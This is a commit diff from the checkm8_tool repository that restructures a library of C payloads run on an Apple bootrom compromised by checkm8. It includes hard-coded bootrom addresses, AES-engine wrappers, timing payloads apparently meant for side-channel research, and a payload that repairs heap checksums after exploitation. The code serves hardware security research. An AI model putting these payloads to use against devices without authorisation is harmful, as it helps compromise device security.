grg/checkm8_tool
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

heavily restructured libpayload, more integrated with c8_remote now

Browse Source
This commit is contained in:
Gregor Haas
2020-02-11 09:56:37 -05:00
parent 983ad0ad29
commit bd4c9b8196
28 changed files with 317 additions and 332 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
CMakeLists.txt
View File

@@ -2,8 +2,8 @@ cmake_minimum_required(VERSION 3.10)
project(checkm8_tool) project(checkm8_tool)
enable_language(C) enable_language(C)
include_directories(c8_remote/include)
include_directories(include) include_directories(include)
#add_subdirectory(c8_arduino) add_subdirectory(c8_remote/lib)
add_subdirectory(c8_remote) add_subdirectory(c8_remote)
add_subdirectory(c8_libpayload)

24
c8_libpayload/pl/include/brfunc_aes.h
View File

@@ -1,24 +0,0 @@
#ifndef CHECKM8_TOOL_BRFUNC_AES_H
#define CHECKM8_TOOL_BRFUNC_AES_H
#include "brfunc_common.h"
int aes_hw_crypto_cmd(unsigned long long cmd,
unsigned char *src, unsigned char *dst,
int len, unsigned long long opts,
unsigned char *key, unsigned char *iv)
{
return ((BOOTROM_FUNC) ADDR_AES_HW_CRYPTO_CMD)(cmd, src, dst, len, opts, key, iv);
}
#define CREATE_KEY_COMMAND ((BOOTROM_FUNC) ADDR_CREATE_KEY_COMMAND)
#define PUSH_COMMAND_KEY ((BOOTROM_FUNC) ADDR_PUSH_COMMAND_KEY)
#define PUSH_COMMAND_IV ((BOOTROM_FUNC) ADDR_PUSH_COMMAND_IV)
#define PUSH_COMMAND_DATA ((BOOTROM_FUNC) ADDR_PUSH_COMMAND_DATA)
#define PUSH_COMMAND_FLAG ((BOOTROM_FUNC) ADDR_PUSH_COMMAND_FLAG)
#define WAIT_FOR_COMMAND_FLAG ((BOOTROM_FUNC) ADDR_WAIT_FOR_COMMAND)
#define rAES_INT_STATUS (long *) ADDR_AES_CONTROL
#define rAES_CONTROL (long *) ADDR_AES_STATUS
#endif //CHECKM8_TOOL_BRFUNC_AES_H

40
c8_libpayload/pl/include/brfunc_common.h
View File

@@ -1,40 +0,0 @@
#ifndef CHECKM8_TOOL_BRFUNC_COMMON_H
#define CHECKM8_TOOL_BRFUNC_COMMON_H
#include "checkm8_config.h"
typedef int (*BOOTROM_FUNC)();
typedef unsigned char (*(*BOOTROM_FUNC_PTR)());
#if CHECKM8_PLATFORM == 8010
/* AES */
#define ADDR_AES_HW_CRYPTO_CMD 0x100000f0c
#define ADDR_CREATE_KEY_COMMAND 0x100000e90
#define ADDR_PUSH_COMMAND_KEY 0x100000c64
#define ADDR_PUSH_COMMAND_IV 0x100000d18
#define ADDR_PUSH_COMMAND_DATA 0x100000d98
#define ADDR_PUSH_COMMAND_FLAG 0x100000e20
#define ADDR_WAIT_FOR_COMMAND 0x100000ec4
#define ADDR_AES_CONTROL 0x20A108008
#define ADDR_AES_STATUS 0x20A108018
/* SEP */
#define ADDR_DPA_SEEDED 0x100001140
#define ADDR_SEND_DPA_MESSAGE 0x100002338
/* Timing */
#define ADDR_CLOCK_GATE 0x100009d4c
#define ADDR_SYSTEM_TIME 0x10000B0E0
#define ADDR_TIME_HAS_ELAPSED 0x10000B04F
#define ADDR_TASK_SLEEP 0x10000ADF0
/* Boot */
#define ADDR_NVME_INIT 0x1000080B4
#else
#error "Unsupported checkm8 platform"
#endif
#endif //CHECKM8_TOOL_BRFUNC_COMMON_H

9
c8_libpayload/pl/include/brfunc_sep.h
View File

@@ -1,9 +0,0 @@
#ifndef CHECKM8_TOOL_BRFUNC_SEP_H
#define CHECKM8_TOOL_BRFUNC_SEP_H
#include "brfunc_common.h"
#define DPA_SEEDED ((BOOTROM_FUNC) ADDR_DPA_SEEDED)
#define SEP_CREATE_SEND_DPA_MESSAGE ((BOOTROM_FUNC) ADDR_SEND_DPA_MESSAGE)
#endif //CHECKM8_TOOL_BRFUNC_SEP_H

12
c8_libpayload/pl/include/brfunc_timing.h
View File

@@ -1,12 +0,0 @@
#ifndef CHECKM8_TOOL_BRFUNC_TIMING_H
#define CHECKM8_TOOL_BRFUNC_TIMING_H
#include "brfunc_common.h"
#define CLOCK_GATE ((BOOTROM_FUNC) ADDR_CLOCK_GATE)
#define SYSTEM_TIME ((BOOTROM_FUNC) ADDR_SYSTEM_TIME)
#define TIME_HAS_ELAPSED ((BOOTROM_FUNC) ADDR_TIME_HAS_ELAPSED)
#define GET_PLL ((BOOTROM_FUNC) ADDR_GET_PLL)
#endif //CHECKM8_TOOL_BRFUNC_TIMING_H

7
c8_libpayload/pl/include/util.h
View File

@@ -1,7 +0,0 @@
#ifndef CHECKM8_TOOL_UTIL_H
#define CHECKM8_TOOL_UTIL_H
#define PAYLOAD_SECTION __attribute__ ((section (".payload_text")))
#define TEXT_SECTION __attribute__((section (".text")))
#endif //CHECKM8_TOOL_UTIL_H

60
c8_libpayload/pl/src/aes.c
View File

@@ -1,60 +0,0 @@
#include "brfunc_aes.h"
#include "brfunc_timing.h"
#include "brfunc_sep.h"
#include "util.h"
PAYLOAD_SECTION
int aes_hw_crypto_command(unsigned int cmd,
void *src,
void *dst,
int len,
unsigned int opts,
void *key,
void *iv)
{
int seeded;
long cgvar;
long start = 0, timeout = 0;
__asm__("orr %0, xzr, #0x3c" : "=r" (cgvar));
CLOCK_GATE(cgvar, 0);
// seeded = DPA_SEEDED();
// if(!(seeded & 1))
// {
// SEP_CREATE_SEND_DPA_MESSAGE();
// start = SYSTEM_TIME();
//
// while(!(seeded & 1) && !(timeout & 1))
// {
// seeded = DPA_SEEDED();
// timeout = TIME_HAS_ELAPSED(start, 1000);
// }
// }
//
// if(timeout) return -1;
unsigned int key_command = CREATE_KEY_COMMAND(0, 0, 0, 0, 1, 0, 0, 0);
*rAES_INT_STATUS = 0x20;
*rAES_CONTROL = 1;
PUSH_COMMAND_KEY(key_command, key);
PUSH_COMMAND_IV(0, 0, 0, iv);
PUSH_COMMAND_DATA(0, 0, src, dst, len);
PUSH_COMMAND_FLAG(0, 1, 1);
WAIT_FOR_COMMAND_FLAG();
*rAES_CONTROL = 2;
CLOCK_GATE(cgvar, 0);
return 0;
}
TEXT_SECTION
int _start(void *src,
void *dst,
void *key)
{
return ((BOOTROM_FUNC) ADDR_AES_HW_CRYPTO_CMD)(0, src, dst, 128, 0, key, 0);
// return aes_hw_crypto_command(0, src, dst, 128, 0, key, 0);
}

62
c8_libpayload/pl/src/exit_usb_task.c
View File

@@ -1,62 +0,0 @@
#include "brfunc_common.h"
#include "util.h"
PAYLOAD_SECTION
void fix_heap()
{
BOOTROM_FUNC calculate_checksum = ((BOOTROM_FUNC) 0x10000ee20);
BOOTROM_FUNC heap_verify = ((BOOTROM_FUNC) 0x10000f8b4);
*((unsigned long long *) 0x1801b91a0) = 0x80 / 0x40;
*((unsigned long long *) 0x1801b91a8) = ((0x840u / 0x40) << 2u);
*((unsigned long long *) 0x1801b91b0) = 0x80;
*((unsigned long long *) 0x1801b91b8) = 0;
*((unsigned long long *) 0x1801b9220) = 0x80 / 0x40;
*((unsigned long long *) 0x1801b9228) = ((0x80u / 0x40) << 2u);
*((unsigned long long *) 0x1801b9230) = 0x80;
*((unsigned long long *) 0x1801b9238) = 0;
*((unsigned long long *) 0x1801b92a0) = 0x80 / 0x40;
*((unsigned long long *) 0x1801b92a8) = ((0x80u / 0x40) << 2u);
*((unsigned long long *) 0x1801b92b0) = 0x80;
*((unsigned long long *) 0x1801b92b8) = 0;
__asm__ volatile ("dmb sy");
calculate_checksum((unsigned long long *) 0x1801b9180,
(unsigned long long *) 0x1801b91a0,
32,
(unsigned long long *) 0x180080640);
calculate_checksum((unsigned long long *) 0x1801b9200,
(unsigned long long *) 0x1801b9220,
32,
(unsigned long long *) 0x180080640);
calculate_checksum((unsigned long long *) 0x1801b9280,
(unsigned long long *) 0x1801b92a0,
32,
(unsigned long long *) 0x180080640);
__asm__ volatile ("dmb sy");
heap_verify();
}
TEXT_SECTION
void _start(unsigned long long ptr_self)
{
unsigned int *completion = (unsigned int *) 0x180088ac8;
unsigned char *dfu_done = (unsigned char *) 0x180088ac0;
unsigned long long *dfu_event = (unsigned long long *) 0x180088af0;
BOOTROM_FUNC event_signal = ((BOOTROM_FUNC) 0x10000aee8);
BOOTROM_FUNC free = ((BOOTROM_FUNC) 0x10000f1b0);
fix_heap();
*completion = -1;
*dfu_done = 1;
event_signal(dfu_event);
free(ptr_self);
}

17
c8_libpayload/pl/src/sysreg.c
View File

@@ -1,17 +0,0 @@
#include "util.h"
struct sysregs
{
long pt_base;
long evt_base;
};
TEXT_SECTION
long long _start()
{
struct sysregs res;
__asm__("mrs %0, ttbr0_el1" : "=r" (res.pt_base));
__asm__("mrs %0, vbar_el1" : "=r" (res.evt_base));
return res.pt_base;
}

21
c8_libpayload/pl/src/task_sleep_test.c
View File

@@ -1,21 +0,0 @@
#include "util.h"
#include "brfunc_common.h"
TEXT_SECTION
void _start(unsigned long long next,
unsigned long long arg0, unsigned long long arg1,
unsigned long long arg2, unsigned long long arg3)
{
int i;
BOOTROM_FUNC clock_gate = ((BOOTROM_FUNC) 0x100009d4cull);
for(i = 0x54 + 6; i > 6; i--)
{
if(i == 0x4b || i == 0x4a || i == 0x49 || i == 0x3e ||
i == 0x1b || i == 0x17 || i == 0x11 || i == 0x10)
continue;
clock_gate(i, 0);
}
((BOOTROM_FUNC) next)(arg0, arg1, arg2, arg3);
}

48
c8_remote/include/bootrom_addr.h Normal file
View File

@@ -0,0 +1,48 @@
#ifndef CHECKM8_TOOL_BOOTROM_ADDR_H
#define CHECKM8_TOOL_BOOTROM_ADDR_H
#include "checkm8_config.h"
#if CHECKM8_PLATFORM == 8010
/* Crypto */
#define ADDR_HARDWARE_AES 0x100000f0c
/* Timing */
#define ADDR_CLOCK_GATE 0x100009d4c
#define ADDR_GET_TIME 0x10000b0e0
#define ADDR_TIMER_REGISTER_INT 0x10000b874
#define ADDR_WFI 0x1000004fc
/* Tasking */
#define ADDR_TASK_NEW 0x10000a9ac
#define ADDR_TASK_RUN 0x10000ac18
#define ADDR_TASK_PAUSE 0x10000adf0
#define ADDR_TASK_RESCHED 0x10000aaa8
#define ADDR_TASK_FREE 0x10000aa20
#define ADDR_EVENT_NEW 0x10000aed4
#define ADDR_EVENT_NOTIFY 0x10000aee8
#define ADDR_EVENT_WAIT 0x10000af3c
/* Heap */
#define ADDR_CALC_CHKSUM 0x10000ee20
#define ADDR_CHECK_BLOCK_CKSUM 0x10000f138
#define ADDR_CHECK_ALL_CHKSUMS 0x10000f8b4
#define ADDR_DEV_MALLOC 0x10000efe0
#define ADDR_DEV_MEMALIGN 0x10000f380
#define ADDR_DEV_FREE 0x10000f1b0
/* Misc */
#define ADDR_RANDOM_RET 0x10000b924
#define ADDR_DFU_RETVAL (int *) 0x180088ac8
#define ADDR_DFU_STATUS (unsigned char *) 0x180088ac0
#define ADDR_DFU_EVENT (unsigned long long *) 0x180088af0
#else
#error "Unsupported checkm8 platform"
#endif
#endif //CHECKM8_TOOL_BOOTROM_ADDR_H

3
c8_remote/include/payload.h
View File

@@ -5,14 +5,11 @@
typedef enum typedef enum
{ {
PAYLOAD_AES,
PAYLOAD_AES_BUSY, PAYLOAD_AES_BUSY,
PAYLOAD_AES_SW, PAYLOAD_AES_SW,
PAYLOAD_EXIT_USB_TASK, PAYLOAD_EXIT_USB_TASK,
PAYLOAD_FLOPPYSLEEP, PAYLOAD_FLOPPYSLEEP,
PAYLOAD_SYNC, PAYLOAD_SYNC,
PAYLOAD_SYSREG,
PAYLOAD_TASK_SLEEP_TEST
} PAYLOAD_T; } PAYLOAD_T;
typedef enum typedef enum

19
c8_libpayload/CMakeLists.txt → c8_remote/lib/CMakeLists.txt
View File

@@ -1,35 +1,32 @@
project(checkm8_libpayload) project(checkm8_libpayload)
set(PL_NAMES set(PL_NAMES
aes
aes_busy aes_busy
aes_sw aes_sw
exit_usb_task exit_usb_task
floppysleep floppysleep
sync sync)
sysreg
task_sleep_test)
foreach(NAME ${PL_NAMES}) foreach(NAME ${PL_NAMES})
list(APPEND PL_TARGETS "payload_${NAME}") list(APPEND PL_TARGETS "payload_${NAME}")
list(APPEND PL_SRC_BIN "${CMAKE_CURRENT_LIST_DIR}/pl/src/${NAME}.c") list(APPEND PL_SRC_BIN "${CMAKE_CURRENT_LIST_DIR}/payload/src/${NAME}.c")
endforeach(NAME) endforeach(NAME)
foreach(TARGET ${PL_TARGETS}) foreach(TARGET ${PL_TARGETS})
list(APPEND PL_SRC_LIB "${CMAKE_CURRENT_BINARY_DIR}/lib/${TARGET}.c") list(APPEND PL_SRC_LIB "${CMAKE_CURRENT_BINARY_DIR}/lib_cfiles/${TARGET}.c")
list(APPEND PL_BIN "${CMAKE_CURRENT_BINARY_DIR}/pl/bin/${TARGET}.bin") list(APPEND PL_BIN "${CMAKE_CURRENT_BINARY_DIR}/payload/bin/${TARGET}.bin")
endforeach(TARGET) endforeach(TARGET)
add_subdirectory(pl) add_subdirectory(${CMAKE_CURRENT_LIST_DIR}/payload)
file(MAKE_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/lib) file(MAKE_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/lib_cfiles)
add_custom_target(payload_sources add_custom_target(payload_sources
BYPRODUCTS ${PL_SRC_LIB} BYPRODUCTS ${PL_SRC_LIB}
DEPENDS ${PL_TARGETS} DEPENDS ${PL_TARGETS}
COMMENT "Refreshing payload library" COMMENT "Refreshing payload library"
COMMAND python3 ${CMAKE_CURRENT_LIST_DIR}/scripts/librarize.py COMMAND python3 ${CMAKE_CURRENT_LIST_DIR}/scripts/librarize.py
${CMAKE_CURRENT_BINARY_DIR}/pl/bin ${CMAKE_CURRENT_BINARY_DIR}/payload/bin
${CMAKE_CURRENT_BINARY_DIR}/lib) ${CMAKE_CURRENT_BINARY_DIR}/lib_cfiles)
add_library(payload ${PL_SRC_LIB}) add_library(payload ${PL_SRC_LIB})
add_dependencies(payload payload_sources) add_dependencies(payload payload_sources)

14
c8_libpayload/pl/CMakeLists.txt → c8_remote/lib/payload/CMakeLists.txt
View File

@@ -1,6 +1,6 @@
project(checkm8_libpayload_sources C ASM) project(checkm8_libpayload_sources C ASM)
include_directories(include) include_directories(${CMAKE_CURRENT_LIST_DIR}/include)
include_directories(include/openssl)
set(CMAKE_SYSTEM_PROCESSOR arm) set(CMAKE_SYSTEM_PROCESSOR arm)
if(${CMAKE_HOST_SYSTEM_PROCESSOR} STREQUAL "x86_64") if(${CMAKE_HOST_SYSTEM_PROCESSOR} STREQUAL "x86_64")
@@ -15,9 +15,11 @@ elseif(${CMAKE_HOST_SYSTEM_PROCESSOR} STREQUAL "armv7l")
set(CMAKE_OBJCOPY /opt/cross/bin/aarch64-linux-objcopy) set(CMAKE_OBJCOPY /opt/cross/bin/aarch64-linux-objcopy)
endif() endif()
set(CMAKE_C_FLAGS "-nostdlib -O") set(CMAKE_C_FLAGS "-nostdlib -O -Wl,--gc-sections")
file(MAKE_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/bin) file(MAKE_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/bin)
add_library(bootrom_dev bootrom_dev.c)
foreach(NAME ${PL_NAMES}) foreach(NAME ${PL_NAMES})
if(EXISTS ${CMAKE_CURRENT_LIST_DIR}/src/${NAME}.S) if(EXISTS ${CMAKE_CURRENT_LIST_DIR}/src/${NAME}.S)
add_executable(payload_${NAME} ${CMAKE_CURRENT_LIST_DIR}/src/${NAME}.c add_executable(payload_${NAME} ${CMAKE_CURRENT_LIST_DIR}/src/${NAME}.c
@@ -25,10 +27,12 @@ foreach(NAME ${PL_NAMES})
else() else()
add_executable(payload_${NAME} ${CMAKE_CURRENT_LIST_DIR}/src/${NAME}.c) add_executable(payload_${NAME} ${CMAKE_CURRENT_LIST_DIR}/src/${NAME}.c)
endif() endif()
target_link_libraries(payload_${NAME} bootrom_dev)
add_custom_command(TARGET payload_${NAME} POST_BUILD add_custom_command(TARGET payload_${NAME} POST_BUILD
BYPRODUCTS ${CMAKE_CURRENT_BINARY_DIR}/bin/payload_${NAME}.bin BYPRODUCTS ${CMAKE_CURRENT_BINARY_DIR}/bin/payload_${NAME}.bin
COMMAND ${CMAKE_OBJCOPY} COMMAND ${CMAKE_OBJCOPY}
ARGS -O binary -j .text -j .payload_text -j .payload_data ARGS -O binary -j .text -j .payload_text -j .bootrom_lib.*
${CMAKE_CURRENT_BINARY_DIR}/payload_${NAME} ${CMAKE_CURRENT_BINARY_DIR}/payload_${NAME}
${CMAKE_CURRENT_BINARY_DIR}/bin/payload_${NAME}.bin) ${CMAKE_CURRENT_BINARY_DIR}/bin/payload_${NAME}.bin)
endforeach(NAME) endforeach(NAME)

123
c8_remote/lib/payload/bootrom_dev.c Normal file
View File

@@ -0,0 +1,123 @@
#include "bootrom_addr.h"
#include "dev_util.h"
/* Crypto */
BRLIB_SECTION("crypto")
int hardware_aes(unsigned long long cmd,
unsigned char *src, unsigned char *dst,
int len, unsigned long long opts,
unsigned char *key, unsigned char *iv)
{
return ((BOOTROM_FUNC_I) ADDR_HARDWARE_AES)(cmd, src, dst, len, opts, key, iv);
}
/* Timing */
BRLIB_SECTION("timing.power")
int clock_gate(int device, int power)
{
return ((BOOTROM_FUNC_I) ADDR_CLOCK_GATE)(device, power);
}
BRLIB_SECTION("timing.time")
unsigned long long get_time()
{
return ((BOOTROM_FUNC_ULL) ADDR_GET_TIME)();
}
BRLIB_SECTION("timing.sleep")
void timer_register_int(unsigned long long dl)
{
((BOOTROM_FUNC_V) ADDR_TIMER_REGISTER_INT)(dl, ADDR_RANDOM_RET);
}
BRLIB_SECTION("timing.sleep")
void wfi()
{
((BOOTROM_FUNC_V) ADDR_WFI)();
}
/* Tasking */
BRLIB_SECTION("tasking.task")
void *task_new(char *name, BOOTROM_FUNC_I func, void *args, int ssize)
{
return ((BOOTROM_FUNC_PTR) ADDR_TASK_NEW)(name, func, args, ssize);
}
void task_run(void *task)
{
((BOOTROM_FUNC_V) ADDR_TASK_RUN)(task);
}
BRLIB_SECTION("tasking.task")
void task_pause(int usec)
{
((BOOTROM_FUNC_V) ADDR_TASK_PAUSE)(usec);
}
BRLIB_SECTION("tasking.task")
void task_resched()
{
((BOOTROM_FUNC_V) ADDR_TASK_RESCHED)();
}
BRLIB_SECTION("tasking.task")
void task_free(void *task)
{
((BOOTROM_FUNC_V) ADDR_TASK_FREE)(task);
}
BRLIB_SECTION("tasking.event")
void event_new(void *dst, int flags, int state)
{
((BOOTROM_FUNC_V) ADDR_EVENT_NEW)(dst, flags, state);
}
BRLIB_SECTION("tasking.event")
void event_notify(void *ev)
{
((BOOTROM_FUNC_V) ADDR_EVENT_NOTIFY)(ev);
}
BRLIB_SECTION("tasking.event")
void event_wait(void *ev)
{
((BOOTROM_FUNC_V) ADDR_EVENT_WAIT)(ev);
}
/* Heap */
BRLIB_SECTION("heap.mgmt")
void calc_chksum(unsigned long long *dst, unsigned long long *src,
int len, unsigned long long *cookie)
{
((BOOTROM_FUNC_V) ADDR_CALC_CHKSUM)(dst, src, len, cookie);
}
BRLIB_SECTION("heap.mgmt")
void check_block_chksum(void *ptr)
{
((BOOTROM_FUNC_V) ADDR_CHECK_BLOCK_CKSUM)(ptr);
}
BRLIB_SECTION("heap.mgmt")
void check_all_chksums()
{
((BOOTROM_FUNC_V) ADDR_CHECK_ALL_CHKSUMS)();
}
BRLIB_SECTION("heap.alloc")
void *dev_malloc(int size)
{
return ((BOOTROM_FUNC_PTR) ADDR_DEV_MALLOC)(size);
}
BRLIB_SECTION("heap.alloc")
void *dev_memalign(int size, int constr)
{
return ((BOOTROM_FUNC_PTR) ADDR_DEV_MEMALIGN)(size, constr);
}
BRLIB_SECTION("heap.alloc")
void dev_free(void *ptr)
{
((BOOTROM_FUNC_PTR) ADDR_DEV_FREE)(ptr);
}

38
c8_remote/lib/payload/include/bootrom_func.h Normal file
View File

@@ -0,0 +1,38 @@
#ifndef CHECKM8_TOOL_BOOTROM_FUNC_H
#define CHECKM8_TOOL_BOOTROM_FUNC_H
#include "dev_util.h"
/* Crypto */
int hardware_aes(unsigned long long cmd,
unsigned char *src, unsigned char *dst,
int len, unsigned long long opts,
unsigned char *key, unsigned char *iv);
/* Timing */
int clock_gate(int device, int power);
unsigned long long get_time();
void timer_register_int(unsigned long long dl);
void wfi();
/* Tasking */
void *task_new(char *name, BOOTROM_FUNC_I func, void *args, int ssize);
void task_run(void *task);
void task_pause(int usec);
void task_resched();
void task_free(void *task);
void event_new(void *dst, int flags, int state);
void event_notify(void *ev);
void event_wait(void *ev);
/* Heap */
void calc_chksum(unsigned long long *dst, unsigned long long *src, int len, unsigned long long *cookie);
void check_block_chksum(void *ptr);
void check_all_chksums();
void *dev_malloc(int size);
void *dev_memalign(int size, int constr);
void dev_free(void *ptr);
#endif //CHECKM8_TOOL_BOOTROM_FUNC_H

13
c8_remote/lib/payload/include/dev_util.h Normal file
View File

@@ -0,0 +1,13 @@
#ifndef CHECKM8_TOOL_DEV_UTIL_H
#define CHECKM8_TOOL_DEV_UTIL_H
typedef void (*BOOTROM_FUNC_V)();
typedef int (*BOOTROM_FUNC_I)();
typedef unsigned long long (*BOOTROM_FUNC_ULL)();
typedef void (*(*BOOTROM_FUNC_PTR)());
#define PAYLOAD_SECTION __attribute__ ((section (".payload_text")))
#define TEXT_SECTION __attribute__ ((section (".text")))
#define BRLIB_SECTION(s) __attribute__ ((section (".bootrom_lib."s)))
#endif //CHECKM8_TOOL_DEV_UTIL_H

11
c8_libpayload/pl/src/aes_busy.c → c8_remote/lib/payload/src/aes_busy.c
View File

@@ -1,7 +1,4 @@
#include "util.h" #include "bootrom_func.h"
#include "brfunc_aes.h"
#include "brfunc_timing.h"
TEXT_SECTION TEXT_SECTION
int _start(void *src, void *dst, void *key, int rep) int _start(void *src, void *dst, void *key, int rep)
@@ -16,9 +13,9 @@ int _start(void *src, void *dst, void *key, int rep)
// task_sleep(100); // task_sleep(100);
for(i = 0; i < rep; i++) for(i = 0; i < rep; i++)
{ {
if(i % 2 == 0) aes_hw_crypto_cmd(16, src_data, dst, 16, 0, key, 0); if(i % 2 == 0) hardware_aes(16, src_data, dst, 16, 0, key, 0);
else aes_hw_crypto_cmd(16, dst, src_data, 16, 0, key, 0); else hardware_aes(16, dst, src_data, 16, 0, key, 0);
// task_sleep(15); // task_sleep(15);
} }
return 0; return 0;

26
c8_libpayload/pl/src/aes_sw.c → c8_remote/lib/payload/src/aes_sw.c
View File

@@ -1,11 +1,4 @@
#include "util.h" #include "bootrom_func.h"
#include "brfunc_timing.h"
PAYLOAD_SECTION
void task_sleep(unsigned int usec)
{
((BOOTROM_FUNC) ADDR_TASK_SLEEP)(usec);
}
PAYLOAD_SECTION PAYLOAD_SECTION
void sub_bytes(unsigned char block[16], unsigned char sbox[16][16]) void sub_bytes(unsigned char block[16], unsigned char sbox[16][16])
@@ -116,18 +109,6 @@ void expand_key(unsigned char key[16], unsigned char key_sched[176], int n,
} }
} }
PAYLOAD_SECTION
void busy_sleep(int usec)
{
unsigned long long halt = 0x1000004fc;
unsigned long long timer_deadline_enter = 0x10000b874;
unsigned long long now;
__asm__ volatile ("mrs %0, cntpct_el0" : "=r" (now));
((BOOTROM_FUNC) timer_deadline_enter)(now + 24 * usec, ((BOOTROM_FUNC) 0x10000b924));
((BOOTROM_FUNC) halt)();
}
PAYLOAD_SECTION PAYLOAD_SECTION
void aes128_encrypt_ecb(unsigned char *msg, unsigned int msg_len, unsigned char key[16], void aes128_encrypt_ecb(unsigned char *msg, unsigned int msg_len, unsigned char key[16],
unsigned char sbox[16][16], unsigned char rc_lookup[11], unsigned char sbox[16][16], unsigned char rc_lookup[11],
@@ -135,7 +116,6 @@ void aes128_encrypt_ecb(unsigned char *msg, unsigned int msg_len, unsigned char
{ {
unsigned char key_sched[176]; unsigned char key_sched[176];
expand_key(key, key_sched, 11, sbox, rc_lookup); expand_key(key, key_sched, 11, sbox, rc_lookup);
busy_sleep(10);
unsigned int num_blocks = msg_len / 16; unsigned int num_blocks = msg_len / 16;
unsigned char *block; unsigned char *block;
@@ -175,8 +155,8 @@ unsigned long long _start(unsigned char *msg, unsigned int msg_len, unsigned cha
if(2 * end - start - 64 > 0) if(2 * end - start - 64 > 0)
{ {
((BOOTROM_FUNC) timer_deadline_enter)(2 * end - start - 64, ((BOOTROM_FUNC) 0x10000b924)); timer_register_int(2 * end - start - 64);
((BOOTROM_FUNC) halt)(); wfi();
} }
return end - start; return end - start;

52
c8_remote/lib/payload/src/exit_usb_task.c Normal file
View File

@@ -0,0 +1,52 @@
#include "bootrom_addr.h"
#include "bootrom_func.h"
PAYLOAD_SECTION
void fix_heap()
{
*((unsigned long long *) 0x1801b91a0) = 0x80 / 0x40;
*((unsigned long long *) 0x1801b91a8) = ((0x840u / 0x40) << 2u);
*((unsigned long long *) 0x1801b91b0) = 0x80;
*((unsigned long long *) 0x1801b91b8) = 0;
*((unsigned long long *) 0x1801b9220) = 0x80 / 0x40;
*((unsigned long long *) 0x1801b9228) = ((0x80u / 0x40) << 2u);
*((unsigned long long *) 0x1801b9230) = 0x80;
*((unsigned long long *) 0x1801b9238) = 0;
*((unsigned long long *) 0x1801b92a0) = 0x80 / 0x40;
*((unsigned long long *) 0x1801b92a8) = ((0x80u / 0x40) << 2u);
*((unsigned long long *) 0x1801b92b0) = 0x80;
*((unsigned long long *) 0x1801b92b8) = 0;
__asm__ volatile ("dmb sy");
calc_chksum((unsigned long long *) 0x1801b9180,
(unsigned long long *) 0x1801b91a0,
32,
(unsigned long long *) 0x180080640);
calc_chksum((unsigned long long *) 0x1801b9200,
(unsigned long long *) 0x1801b9220,
32,
(unsigned long long *) 0x180080640);
calc_chksum((unsigned long long *) 0x1801b9280,
(unsigned long long *) 0x1801b92a0,
32,
(unsigned long long *) 0x180080640);
__asm__ volatile ("dmb sy");
check_all_chksums();
}
TEXT_SECTION
void _start(unsigned long long *ptr_self)
{
fix_heap();
*(ADDR_DFU_RETVAL) = -1;
*(ADDR_DFU_STATUS) = 1;
event_notify(ADDR_DFU_EVENT);
dev_free(ptr_self);
}

0
c8_libpayload/pl/src/floppysleep.S → c8_remote/lib/payload/src/floppysleep.S
View File

10
c8_libpayload/pl/src/floppysleep.c → c8_remote/lib/payload/src/floppysleep.c
View File

@@ -1,5 +1,4 @@
#include "brfunc_common.h" #include "bootrom_func.h"
#include "util.h"
extern unsigned long long fs_routine(void); extern unsigned long long fs_routine(void);
@@ -24,10 +23,7 @@ unsigned long long _start(float *init_a)
{ {
int i; int i;
volatile int j = 0; volatile int j = 0;
unsigned long long start, end, report; unsigned long long start, end, report;
unsigned long long timer_deadline_enter = 0x10000b874;
unsigned long long halt = 0x1000004fc;
__asm__ volatile ("isb\n\rmrs %0, cntpct_el0" : "=r" (start)); __asm__ volatile ("isb\n\rmrs %0, cntpct_el0" : "=r" (start));
fs_load(init_a, 1); fs_load(init_a, 1);
@@ -36,8 +32,8 @@ unsigned long long _start(float *init_a)
if(2 * end - start - 64 > 0) if(2 * end - start - 64 > 0)
{ {
((BOOTROM_FUNC) timer_deadline_enter)(2 * end - start - 64, ((BOOTROM_FUNC) 0x10000b924)); timer_register_int(2 * end - start - 64);
((BOOTROM_FUNC) halt)(); wfi();
} }
__asm__ volatile ("isb\n\rmrs %0, cntpct_el0" : "=r" (report)); __asm__ volatile ("isb\n\rmrs %0, cntpct_el0" : "=r" (report));

2
c8_libpayload/pl/src/sync.c → c8_remote/lib/payload/src/sync.c
View File

@@ -1,4 +1,4 @@
#include "util.h" #include "dev_util.h"
TEXT_SECTION TEXT_SECTION
void _start() void _start()

0
c8_libpayload/scripts/headerize.py → c8_remote/lib/scripts/headerize.py
View File

0
c8_libpayload/scripts/librarize.py → c8_remote/lib/scripts/librarize.py
View File

34
c8_remote/src/payload.c
View File

@@ -7,6 +7,7 @@
#include "command.h" #include "command.h"
#include "usb_helpers.h" #include "usb_helpers.h"
#include "bootrom_addr.h"
#include "libpayload.h" #include "libpayload.h"
struct payload struct payload
@@ -28,11 +29,6 @@ struct payload *get_payload(PAYLOAD_T p)
switch(p) switch(p)
{ {
case PAYLOAD_AES:
pl = payload_aes;
len = PAYLOAD_AES_SZ;
break;
case PAYLOAD_AES_BUSY: case PAYLOAD_AES_BUSY:
pl = payload_aes_busy; pl = payload_aes_busy;
len = PAYLOAD_AES_BUSY_SZ; len = PAYLOAD_AES_BUSY_SZ;
@@ -58,16 +54,6 @@ struct payload *get_payload(PAYLOAD_T p)
len = PAYLOAD_SYNC_SZ; len = PAYLOAD_SYNC_SZ;
break; break;
case PAYLOAD_SYSREG:
pl = payload_sysreg;
len = PAYLOAD_SYSREG_SZ;
break;
case PAYLOAD_TASK_SLEEP_TEST:
pl = payload_task_sleep_test;
len = PAYLOAD_TASK_SLEEP_TEST_SZ;
break;
default: default:
return NULL; return NULL;
} }
@@ -94,8 +80,8 @@ void free_payload(struct payload *p)
DEV_PTR_T get_address(struct pwned_device *dev, LOCATION_T l, int len) DEV_PTR_T get_address(struct pwned_device *dev, LOCATION_T l, int len)
{ {
checkm8_debug_indent("get_address(dev = %p, loc = %i, len = %i)\n", dev, l, len); checkm8_debug_indent("get_address(dev = %p, loc = %i, len = %i)\n", dev, l, len);
DEV_PTR_T addr_malloc = 0x10000efe0, retval; DEV_PTR_T retval;
unsigned long long malloc_args[2] = {addr_malloc, (unsigned long long) len}; unsigned long long malloc_args[2] = {ADDR_DEV_MALLOC, (unsigned long long) len};
struct dev_cmd_resp *resp = dev_exec(dev, 0, 2, malloc_args); struct dev_cmd_resp *resp = dev_exec(dev, 0, 2, malloc_args);
